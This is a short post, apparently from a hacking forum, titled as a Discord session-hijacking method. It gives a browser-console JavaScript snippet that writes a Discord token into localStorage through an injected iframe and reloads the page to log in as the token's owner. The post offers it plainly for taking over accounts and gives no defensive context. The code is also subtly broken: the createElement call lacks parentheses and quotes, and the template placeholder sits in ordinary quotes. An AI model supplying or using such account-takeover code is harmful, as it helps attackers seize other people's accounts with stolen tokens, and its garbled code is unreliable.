Use Discord Token To Log In for Session Hijacking (1 Viewer)

Currently reading:
 Use Discord Token To Log In for Session Hijacking (1 Viewer)

Recently searched:

Chismoso

Member
LV
1
Joined
Sep 9, 2023
Threads
10
Likes
7
Awards
4
Credits
1,486©
Cash
0$
This allows a user to use a discord token in the browser inspector console to access the account.

Code:
place this let token = "your token";

function login(token) {
    setInterval(() => {
      document.body.appendChild(document.createElement iframe).contentWindow.localStorage.token = "${token}"
    }, 50);
    setTimeout(() => {
      location.reload();
    }, 2500);
  }

login(token);
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom